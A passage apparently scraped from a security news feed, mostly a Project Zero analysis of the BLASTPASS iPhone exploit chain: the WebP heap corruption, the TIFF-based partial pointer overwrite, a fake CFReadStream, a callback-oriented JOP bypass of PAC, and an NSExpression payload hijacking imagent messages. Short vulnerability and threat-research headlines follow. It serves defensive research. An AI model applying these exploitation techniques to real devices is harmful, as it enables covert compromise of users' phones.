to sit directly in front of this small region). That corruption has the following effect (shown in bold): (lldb) x/200wh 0x148000028 0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000058: 0x0007 0x0027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000 It's changed the size of an in-use allocation from 3 blocks to 39 (or from 1536 to 19968 bytes). I mentioned before that the maximum size of an in-use allocation is meant to be 31 blocks, but this doesn't seem to be checked in every single free path. If things don't quite work out, you'll hit a runtime check. But if things do work out you end up with a situation like this: (lldb) x/200wh 0x148000028 0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027 0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000 The yellow (0x8027) allocation now extends beyond its original three blocks and completely overlaps the following green (0x18) and blue (0x3) as well as the start of the purple (0x1c) allocation. But as soon as this corruption occurs WebP parsing fails and it's not going to make any other allocations. So what are they doing? How are they able to leverage these overlapping allocations? I was pretty stumped. One theory was that perhaps it was some internal ImageIO or BlastDoor specific object which reallocated the overlapping memory. Another theory was that perhaps the exploit had two parts; this first part which puts overlapping entries on the allocator freelist, then another file which is sent to exploit that? And maybe I was lacking that file? But then, why would there be that huge 1MB payload with NSExpressions in it? That didn't add up.Puzzling pieces As is so often the case, stepping back and not thinking about the problem for a while I realised that I'd completely overlooked and forgotten something critical. Right at the very start of the analysis I had run file on all the files inside the PKPass and noted that background.png was actually not a png but a TIFF. I had then completely forgotten that. But now the solution seemed obvious: the reason to use a PKPass versus just a WebP is that the PKPass parser will render multiple images in sequence, and there must be something in the TIFF which reallocates the overlapping allocation with something useful. Libtiff comes with a suite of tools for parsing tiff files. tiffdump displays the headers and EXIF tags: $ tiffdump background-15.tiff background-15.tiff: Magic: 0x4d4d Version: 0x2a Directory 0: offset 68 (0x44) next 0 (0) ImageWidth (256) SHORT (3) 1<48> ImageLength (257) SHORT (3) 1<16> BitsPerSample (258) SHORT (3) 4<8 8 8 8> Compression (259) SHORT (3) 1<8> Photometric (262) SHORT (3) 1<2> StripOffsets (273) LONG (4) 1<8> Orientation (274) SHORT (3) 1<1> SamplesPerPixel (277) SHORT (3) 1<4> StripByteCounts (279) LONG (4) 1<59> PlanarConfig (284) SHORT (3) 1<1> ExtraSamples (338) SHORT (3) 1<2> 700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> The presence of the four 15KB buffers is notable, but they seemed to mostly just be zeros. Here's the output from tiffinfo: $ tiffinfo -c -j -d -s -z background-15.tiff === TIFF directory 0 === TIFF Directory at offset 0x44 (68)   Image Width: 48 Image Length: 16   Bits/Sample: 8   Compression Scheme: AdobeDeflate   Photometric Interpretation: RGB color   Extra Samples: 1   Orientation: row 0 top, col 0 lhs   Samples/Pixel: 4   Planar Configuration: single image plane   XMLPacket (XMP Metadata):   RichTIFFIPTC Data: , 15347 bytes   Photoshop Data: , 15347 bytes   ICC Profile: , 15347 bytes   1 Strips:       0: [       8,       59] Strip 0:  00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00 01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  cd ab 34 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... This dumps the uncompressed TIFF strip buffer and this looks much more interesting! There's clearly some structure, though not a lot of it. Is this really enough to do something useful? It looks like there could be some sort of object, but I didn't recognise the structure, and had no idea how replacing an object with this would be useful. I explored two possibilities:1) Alpha blending: This is actually the raw TIFF strip after decompression but before the rendering step which applies the alpha, so it was possible that this got rendered "on top" of another object. That seemed like a reasonable explanation for why the object seemed so sparse; perhaps the idea was to just "move" a pointer value. The first 16 bytes of the strip look like this: 00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00 which when viewed as two 64-bit values look like this: 0x0000000000000000 0x0000000100001384 It seemed sort-of plausible that rendering the 0x100001384 on top of another pointer might be a neat primitive, but there was something that didn't quite add up. This pointer-ish value is at the start of the strip buffer, so if the overlapping allocation got reallocated with this strip buffer directly, nothing interesting would happen, as the overlapping parts are further along. Maybe the overlapping buffer gets split up multiple times, but this was seeming less and less likely, and I couldn't reproduce this part of the exploit to actually observe what happened.2) This is an object: The other theory I had was that this actually was an object. The 8 zero bytes at the start were certainly strange… so then what's the significance of the next 8 bytes? 84 13 00 00 01 00 00 00 I tried using lldb's memory find command to see if there were other instances of that exact byte sequence occurring in a test iOS app rendering the WebP then the TIFF using the CoreGraphics APIs: (lldb) memory find -e 0x100001384 -- 0x100000000 0x200000000 data not found within the range. Nope, plus it was very, very slow. One thing I had noticed was that this byte sequence was similar to one near the start of the 1MB groom object: 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......| They're not identical, but it seemed a strange coincidence. I took a bunch of test app core dumps using lldb's process save-core command and wrote some simple code to search for similar-ish byte patterns. After some experimentation I managed to find something: 1c7b2600  49 d2 e4 29 02 00 00 01  84 13 00 00 02 00 00 00  |I..)............| 1c7b2610  42 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |B...............| 1c7b2620  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 1c7b2630  c0 92 d6 83 02 00 00 00  00 93 d6 83 02 00 00 00  |................| Converting those coredump offsets into VM address and looking them up revealed: (lldb) x/10xg 0x121E47600 0x121e47600: 0x0100000229e4d249 0x0000000200001384 0x121e47610: 0x0000000000000042 0x0000000000000000 0x121e47620: 0x0000000000000000 0x0000000000000000 (lldb) image lookup --address 0x229e4d248       Address: CoreFoundation[0x00000001dceed248] (CoreFoundation.__DATA_DIRTY.__objc_data + 7800)       Summary: (void *)0x0000000229e4d0e0: __NSCFArray It's an NSCFArray, which is the Foundation (Objective-C) "toll-free bridged" version of the Core Foundation (C) CFArray type! This was the hint that I was looking for to identify the significance of the TIFF and that 1MB groom object, which also contains a similar byte sequence. Cores and Foundations Even though Apple hasn't updated the open-source version of CoreFoundation for almost a decade, the old source is still helpful. Here's what a CoreFoundation object looks like: /* All CF "instances" start with this structure.  Never refer to  * these fields directly -- they are for CF's use and may be added  * to or removed or change format without warning.  Binary  * compatibility for uses of this struct is not guaranteed from  * release to release.  */ typedef struct __CFRuntimeBase {     uintptr_t _cfisa;     uint8_t _cfinfo[4]; #if __LP64__     uint32_t _rc; #endif } CFRuntimeBase; So the header is an Objective-C isa pointer followed by four bytes of _cfinfo, followed by a reference count. Taking a closer look at the uses of __cfinfo: CF_INLINE CFTypeID __CFGenericTypeID_inline(const void *cf) {   // yes, 10 bits masked off, though 12 bits are   // there for the type field; __CFRuntimeClassTableSize is 1024   uint32_t *cfinfop = (uint32_t *)&(((CFRuntimeBase *)cf)->_cfinfo);   CFTypeID typeID = (*cfinfop >> 8) & 0x03FF; // mask up to 0x0FFF   return typeID; } It seems that the second byte in __cfinfo is a type identifier. And indeed, running expr (int) CFArrayGetTypeID() in lldb prints: 19 (0x13) which matches up with both the object found in the coredump as well as the strange (or now not so strange) object in the TIFF strip buffer.X steps forwards, Y steps back Looking through more of the CoreFoundation code it seems that the object in the TIFF strip buffer is a CFArray with inline storage containing one element with the value 0x1234abcd. It also seems that it's possible for CF objects to have NULL isa pointers, which explains why the first 8 bytes of the fake object are zero. This is interesting, but it still doesn't actually get us any closer to figuring out what the next step of the exploit actually is. If the CFArray is meant to overlap with something, then what? And what interesting side-effects could having an CFArray with only a single element with the value 0x1234abcd possibly have? This seems like one step forward and two steps back, but there's something else which we can now figure out: what that 1MB groom object actually is. Let's take a look at the start of it again: 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......| 00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............| 00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....| 00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| It looks like another CF object, starting at +0x10 in the buffer with the same NULL isa pointer, a reference count of 1 and a __cfinfo of {0x80, 0x26, 0, 0}. The type identifiers aren't actually fixed, they're allocated dynamically via calls to _CFRuntimeRegisterClass like this: CFTypeID CFArrayGetTypeID(void) {     static dispatch_once_t initOnce;     dispatch_once(&initOnce, ^{ __kCFArrayTypeID = _CFRuntimeRegisterClass(&__CFArrayClass); });     return __kCFArrayTypeID; } The CFTypeIDs are really just indexes into the __CFRuntimeClassTable array, and even though the types are allocated dynamically the ordering seems sufficiently stable that the hardcoded type values in the exploit work. 0x26 is the CFTypeID for CFReadStream: struct _CFStream {     CFRuntimeBase _cfBase;     CFOptionFlags flags;     CFErrorRef error;     struct _CFStreamClient *client;     void *info;     const struct _CFStreamCallBacks *callBacks;     CFLock_t streamLock;     CFArrayRef previousRunloopsAndModes;     dispatch_queue_t queue; }; Looking through the CFStream code it seems to call various callback functions during object destruction — that seems like a very likely path towards code execution, though with some significant caveats: Caveat I: It's still unclear how an overlapping allocation in the small malloc region could lead to a CFRelease being called on this 1MB allocation. Caveat II: What about ASLR? There have been some tricks in the past targeting "universal gadgets" which work across multiple slides. Nemo also had a neat objective-c trick for defeating ASLR in the past, so it's plausible that there's something like that here. Caveat III: What about PAC? If it's a data-only attack then maybe PAC isn't an issue, but if they are trying to JOP they'd need a trick beyond just an ASLR leak, as all forward control flow edges should be protected by PAC.Special Delivery Around this time in my analysis Matthias Frielingsdorf offered me the use of an iPhone running 16.6, the same version as the targeted ITW victim. With Matthias' vulnerable iPhone, I was able to use the Dopamine jailbreak to attach lldb to MessagesBlastDoorService and after a few tries was able to reproduce the exploit right up to the CFRelease call on the fake CFReadStream, confirming that that part of my analysis was correct! Collecting a few crashes led, yet again, to even more questions...Caveat I: Mysterious Pointers Similar to the analysis of the huffman tables, there was a clear pattern in the fake object pointers, which this time were even stranger than the huffman tables. The crash site was here: LDR    X8, [X19,#0x30] LDR    X8, [X8,#0x58] At this point X19 points to the fake CFReadStream object, and collecting a few X19 values there's a pretty clear pattern: 0x000000075f000010 0x0000000d4f000010 The fake object is inside a 1MB heap allocation, but all those fake object addresses are always 16 bytes above a 16MB-aligned address. It seemed really strange to me to end up with a pointer 0x10 bytes past such a round number. What kind of construct would lead to the creation of such a pointer? Even though I did have a debugger attached to MessagesBlastDoorService, it wasn't a time-travel debugger, so figuring out the history of such a pointer was non-trivial. Using the same core dump analysis techniques I could see that the pointer which would end up in X19 was also present in the backing buffer of the CFSet described earlier. But how did it get there? Having found the strange CFArray inside the TIFF I was heavily biased towards believing that this must have something to do with it, so I wrote some tooling to modify the fake CFArray's in the TIFF in the exploit. The theory was that by messing with that CFArray, I could cause a crash when it was used and figure out what was going on. But making minor changes to the strip buffer didn't seem to have any effect — the exploit still worked! Even replacing the entire strip buffer with A's didn't stop the exploit working... What's going on?Stepping back I had made a list of the primitives I thought might lead to the creation of such a strange looking pointer — first on the list was a partial pointer overwrite. But then why the CFArray? But now having shown that the CFArray can't be involved, it was time to go back to the list. And step back even further and make sure I'd really looked at all of that TIFF... There were still those four other metadata buffers in the tiffdump output I'd shown earlier: 700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> 34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...> I'd just dismissed them, but, maybe I shouldn't have done that? I had actually already dumped the full contents of each of those buffers and checked that there wasn't something else apart from the zeros. They were all zeros, except the third-to-last bytes which were 0x10, which I'd considered completely uninteresting. Uninteresting, unless you wanted to partially overwrite the three least-significant bytes of a little-endian pointer value with 0x000010 that is! Let's look back at the SMALL metadata: 0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027 Each of those four metadata buffers in the TIFF is 15347 bytes, which is 0x3bf3 — looked at another way that's 0x3c00 (the size rounded up to the next 0x200 block size), minus 5, minus 8. 0x3c00 is exactly 30 0x200 byte blocks. Each 16-bit word in the metadata array shown above corresponds to one 0x200 block, where the overlapping chunk in yellow starts at 0x14800005a. Counting forwards 30 chunks means that the end of a 0x3c00 allocation overlaps perfectly with the end of the original blue three-chunk allocation: 0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027 This has the effect of overwriting all but the last 16 bytes of the blue allocation with zeros, then overwriting the three least-significant bytes of the second-to-last pointer-sized value with 0x10 00 00; which, if that memory happened to contain a pointer, has the effect of "shifting" that pointer down to the nearest 16MB boundary, then adding 0x10 bytes! (For those who saw my 2024 Offensivecon talk, this was the missing link between the overlapping allocations and code execution I mentioned.) As mentioned earlier, that blue allocation starting with 0x0003 is the backing buffer of a CFSet object from the bplist inside the WebP MakerNote. The set is constructed in a very precise fashion such that the target pointer (the one to be rounded down) ends up as the second-to-last pointer in the backing buffer. The 1MB object is then also groomed such that it falls on a 16MB boundary below the object which the CFSet entry originally points to. Then when that CFSet is destructed it calls CFRelease on each object, causing the fake CFReadStream destructor to run.Caveat II: ASLR We've looked at the whole flow from huffman table overflow to CFRelease being invoked on a fake CFReadStream — but there's still stuff missing. The second open question I discussed earlier was ASLR. I had theorised that maybe it used a trick like a universal gadget, but is that the case? In addition to the samples, I was also able to obtain a number of crash logs from failed exploit attempts where those samples were thrown, which meant I could figure out the ASLR slide of the MessagesBlastDoorService when the exploit failed. In combination with the target device and exact OS build (also contained in the crash log) I could then obtain the matching dyld_shared_cache, subtract the runtime ASLR slide from a bunch of the pointer-looking things in the 1MB object and take a look at them. The simple answer is: the 1MB object contains a large number of hardcoded, pre-slid, valid pointers. There's no weird machine, tricks or universal gadget here. By the time the PKPass is built and sent by the attackers they already know both the target device type and build as well as the runtime ASLR slide of the MessagesBlastDoorService... Based on analysis by iVerify, as well as analysis of earlier exploit chains published by Citizen Lab, my current working theory is that the large amount of HomeKit traffic seen in those cases is likely a separate ASLR/memory disclosure exploit.Caveat III: Pointer Authentication In the years since PAC was introduced we've seen a whole spectrum of interesting ways to either defeat, or just avoid, PAC. So what did these attackers do? To understand that let's follow the CFReadStream destruction code closely. (All these code snippets are from the most recently available version of CF from 2015, but the code doesn't seem to have changed much.) Here's the definition of the CFReadStream: static const CFRuntimeClass __CFReadStreamClass = {     0,     "CFReadStream",     NULL,      // init     NULL,      // copy     __CFStreamDeallocate,     NULL,     NULL,     NULL,      // copyHumanDesc     __CFStreamCopyDescription }; When a CFReadStream is passed to CFRelease, it will call __CFStreamDeallocate: static void __CFStreamDeallocate(CFTypeRef cf) {   struct _CFStream *stream = (struct _CFStream *)cf;   const struct _CFStreamCallBacks *cb =     _CFStreamGetCallBackPtr(stream);   CFAllocatorRef alloc = CFGetAllocator(stream);   _CFStreamClose(stream); _CFStreamGetCallBackPtr just returns the CFStream's callBacks field: CF_INLINE const struct _CFStreamCallBacks *_CFStreamGetCallBackPtr(struct _CFStream *stream) {     return stream->callBacks; } Here's _CFStreamClose: CF_PRIVATE void _CFStreamClose(struct _CFStream *stream) {   CFStreamStatus status = _CFStreamGetStatus(stream);   const struct _CFStreamCallBacks *cb =     _CFStreamGetCallBackPtr(stream);   if (status == kCFStreamStatusNotOpen ||        status == kCFStreamStatusClosed ||        (status == kCFStreamStatusError &&         __CFBitIsSet(stream->flags, HAVE_CLOSED)       ))   {     // Stream is not open from the client's perspective;     // do not callout and do not update our status to "closed"     return;   }   if (! __CFBitIsSet(stream->flags, HAVE_CLOSED)) {         __CFBitSet(stream->flags, HAVE_CLOSED);         __CFBitSet(stream->flags, CALLING_CLIENT);     if (cb->close) {       cb->close(stream, _CFStreamGetInfoPointer(stream));     } _CFStreamGetStatus extracts the status bitfield from the flags field: #define __CFStreamGetStatus(x) __CFBitfieldGetValue((x)->flags, MAX_STATUS_CODE_BIT, MIN_STATUS_CODE_BIT) Looking at the 1MB object again the flags field is the first non-base field: 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......| 00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............| 00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....| 00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| That gives a status code of 0x1f with all the other flags bits clear. This gets through the two conditional branches to reach this close callback call:   if (cb->close) {     cb->close(stream, _CFStreamGetInfoPointer(stream));   } At this point we need to switch to looking at the assembly to see what's really happening: __CFStreamClose var_30= -0x30 var_20= -0x20 var_10= -0x10 var_s0=  0 PACIBSP STP             X24, X23, [SP,#-0x10+var_30]! STP             X22, X21, [SP,#0x30+var_20] STP             X20, X19, [SP,#0x30+var_10] STP             X29, X30, [SP,#0x30+var_s0] ADD             X29, SP, #0x30 MOV             X19, X0 BL              __CFStreamGetStatus CBZ             X0, loc_187076958 The fake CFReadStream is the first argument to this function, so passed in the X0 register. It's then stored into X19 so it survives the call to __CFStreamGetStatus. Skipping ahead past the flag checks we reach the callback callsite (this is also the crash site seen earlier): LDR             X8, [X19,#0x30] ... LDR             X8, [X8,#0x58] CBZ             X8, loc_187076758 LDR             X1, [X19,#0x28] MOV             X0, X19 BLRAAZ          X8 Let's walk through each instruction in turn there: First it loads the 64-bit value from X19+0x30 into X8: LDR             X8, [X19,#0x30] Looking at the hexdump of the 1MB object above this will load the value 0x25846ec20. From the crash reports we know the runtime ASLR slide of the MessagesBlastDoorService when this exploit was thrown was 0x3A8D0000, so subtracting that we can figure out where in the shared cache this pointer should point: 0x25846ec20-0x3A8D0000=0x21DB9EC20 It points into the __const segment of the TextToSpeechMauiSupport library in the shared cache: The next instruction adds 0x58 to that TextToSpeechMauiSupport pointer and reads a 64-bit value from there: LDR             X8, [X8,#0x58] // x8 := [0x21DB9EC20+0x58] This loads the pointer to the function _DataSectionWriter_CommitDataBlock from 0x21DB9EC78. IDA is simplifying something for us here: the function pointer loaded there is actually signed with the A-family instruction key with a zero context. This signing happens transparently (either during load or when the page is faulted in). The remaining four instructions then check that the pointer wasn't NULL, load X1 from offset +0x28 in the fake 1MB object, move the pointer to the fake object back into X0 and call the PAC'ed _DataSectionWriter_CommitDataBlock function pointer via BLRAAZ: CBZ             X8, loc_187076758 LDR             X1, [X19,#0x28] MOV             X0, X19 BLRAAZ          X8 Callback-Oriented Programming A well-known attack against PAC is to swap two valid, PAC'ed pointers which are signed in the same way but point to different places (e.g. swapping two function pointers with different semantics, allowing you to exploit those semantic differences). Since a large number of PAC-protected pointers are signed with the A-family instruction key with a zero-context value, there are a large number of pointers to choose from. "Just" having an ASLR defeat shouldn't be enough to achieve this though; surely you'd need to disclose the actual PAC'ed pointer value? But that's not what happened above. Notice that the CFStream objects don't directly contain the callback function pointers — there's an extra level of indirection. The CFStream object contains a pointer to a callback structure, and that structure has the PAC'd function pointers. And crucially: that first pointer, the one to the callbacks structure, isn't protected by PAC. This means that the attackers can freely swap pointers to callback structures, operating one-level removed from the function pointers. This might seem like a severe constraint, but the dyld_shared_cache is vast and there are easily enough pre-existing callback structures to build a "callback-oriented JOP" chain, chaining together unsigned pointers to signed function pointers. The initial portion of the payload is a large callback-oriented JOP chain which is used to bootstrap the evaluation of the next payload stage, a large NSExpression.Similarities There are a number of similarities between this exploit chain and PWNYOURHOME, an earlier exploit also attributed by CitizenLab to NSO, described in this blog post in April 2023. That chain also had an initial stage targeting HomeKit, followed by a stage targeting MessagesBlastDoorService and also involving a MakerNote object — the Citizen Lab post claims that at the time the MakerNote was inside a PNG file. My guess would be that that PNG was being used as the delivery mechanism for the MakerNote bplist heap grooming primitives discussed in this post. Based on Citizen Lab's description it also seems like PWNYOURHOME was leveraging a similar callback-oriented JOP technique, and it seems likely that there was also a HomeKit-based ASLR disclosure. The PWNYOURHOME post has a couple of extra details around a minor fix which Apple made, preventing parsing of "certain HomeKit messages unless they arrive from a plausible source." But there still aren't enough details to figure out the underlying vulnerability or primitive. It seems likely to me that the same issue, or a variant thereof was still in use in BLASTPASS.Key material Matthias from iVerify presented an initial analysis of the NSExpression payload at BlackHat Asia in April 2024. In early July 2024, Matthias and I took a closer look at the final stages of the NSExpression payload which decrypts an AES-encrypted NSExpression and executes it. It seems very likely that the encrypted payload contains a BlastDoor sandbox escape. Although the BlastDoor sandbox profile is fairly restrictive it still allows access to a number of system services like notifyd, logd and mobilegestalt. In addition to the syscall attack surface there's also a non-trivial IOKit driver attack surface: ... (allow iokit-open-user-client         (iokit-user-client-class "IOSurfaceRootUserClient")         (iokit-user-client-class "IOSurfaceAcceleratorClient")         (iokit-user-client-class "AGXDevice")) (allow iokit-open-service) (allow mach-derive-port) (allow mach-kernel-endpoint) (allow mach-lookup         (require-all                 (require-not (global-name "com.apple.diagnosticd"))                 (require-any                         (global-name "com.apple.logd")                         (global-name "com.apple.system.notification_center")                         (global-name "com.apple.mobilegestalt.xpc")))) ... (This profile snippet was generated using the Cellebrite labs' fork of SandBlaster) In FORCEDENTRY the sandbox escape was contained directly in the NSExpression payload (though that was an escape from the less-restrictive IMTranscoderAgent sandbox). This time around it seems extra care has been taken to prevent analysis of the sandbox escape. The question is: where does the key come from? We had a few theories: Perhaps the key is just obfuscated, and by completely reversing the NSExpression payload we can find it?Perhaps the key is derived from some target-specific information?Perhaps the key was somehow delivered in some other way and can be read from inside BlastDoor? We spent a day analysing the NSExpression payload and concluded that the third theory appeared to be the correct one. The NSExpression walks up the native stack looking for the communication ports back to imagent. It then hijacks that communication, effectively taking over responsibility for parsing all subsequent incoming requests from imagent for "defusing" of iMessage payloads. The NSExpression loops 100 times, parsing incoming requests as XPC messages, reading the request xpc dictionary then the data xpc data object to get access to the raw, binary iMessage format. It waits until the device receives another iMessage with a specific format, and from that message extracts an AES key which is then used to decrypt the next NSExpression stage and evaluate it. We were unable to recover any messages with the matching format and therefore unable to analyse the next stage of the exploit.Conclusion In contrast to FORCEDENTRY, BLASTPASS's separation of the ASLR disclosure and RCE phases mitigated the need for a novel weird machine. Whilst the heap groom was impressively complicated and precise, the exploit still relied on well-known exploitation techniques. Furthermore, the MakerNote bplist groom and callback-JOP PAC defeat techniques appear to have been in use for multiple years, based on similarities with Citizenlab's blogpost in 2023, which looked at devices compromised in 2022. Enforcing much stricter requirements on the format of the bplist inside the MakerNote (for example: a size limit or a strict-parser mode which rejects duplicate keys) would seem prudent. The callback-JOP issue is likely harder to mitigate. The HomeKit aspect of the exploit chain remains mostly a mystery, but it seems very likely that it was somehow involved in the ASLR disclosure. Samuel Groß's post "A Look at iMessage in iOS 14" in 2021, mentioned that Apple added support for re-randomizing the shared cache slide of certain services. Ensuring that BlastDoor has a unique ASLR slide could be a way to mitigate this. This is the second in-the-wild NSO exploit which relied on simply renaming a file extension to access a parser in an unexpected context which shouldn't have been allowed. FORCEDENTRY had a .gif which was really a .pdf. BLASTPASS had a .png which was really a .webp. A basic principle of sandboxing is treating all incoming attacker-controlled data as untrusted, and not simply trusting a file extension. This speaks to a broader challenge in sandboxing: that current approaches based on process isolation can only take you so far. They increase the length of an exploit chain, but don't necessarily reduce the size of the initial remote attack surface. Accurately mapping, then truly reducing the scope of that initial remote attack surface should be a top priority.

https://googleprojectzero.blogspot.com/2025/03/blasting-past-webp.html
Vulnerability in Fast CAD Reader application
2025-03-26T15:00:00Z | 1743001200

Incorrect Privilege Assignment vulnerability (CVE-2025-2098) has been found in Fast CAD Reader (Beijing Honghu Yuntu Technology) application.

https://cert.pl/en/posts/2025/03/CVE-2025-2098/
Shifting the sands of RansomHub’s EDRKillShifter
2025-03-26T14:58:00Z | 1743001080

ESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa, BianLian, and Play

https://www.welivesecurity.com/en/eset-research/shifting-sands-ransomhub-edrkillshifter/
You will always remember this as the day you finally caught FamousSparrow
2025-03-26T14:45:00Z | 1743000300

ESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group’s signature backdoor, SparrowDoor

https://www.welivesecurity.com/en/eset-research/you-will-always-remember-this-as-the-day-you-finally-caught-famoussparrow/
Security alert Next.js CVE-2025-29927: Stormshield Products Response
2025-03-26T14:23:32Z | 1742999012

A critical authentication bypass vulnerability impacting the Next.js middleware has been reported. It has been assigned the reference CVE-2025-29927 and a CVSS 3.1 score of 9.1. It should be noted that proof of concept are publicly available about this CVE-2025-29927 vulnerability.   Initial vector attack... The post Security alert Next.js CVE-2025-29927: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-next-js-cve-2025-29927-stormshield-products-response/
Security alert Next.js CVE-2025-29927: Stormshield Products Response
2025-03-26T14:23:32Z | 1742999012

A critical authentication bypass vulnerability impacting the Next.js middleware has been reported. It has been assigned the reference CVE-2025-29927 and a CVSS 3.1 score of 9.1. It should be noted that proof of concept are publicly available about this CVE-2025-29927 vulnerability.   Initial vector attack... The post Security alert Next.js CVE-2025-29927: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-next-js-cve-2025-29927-stormshield-products-response/
Testing the Limits: Inside Owl Cyber Defense’s SEER Lab
2025-03-26T14:06:56Z | 1742998016

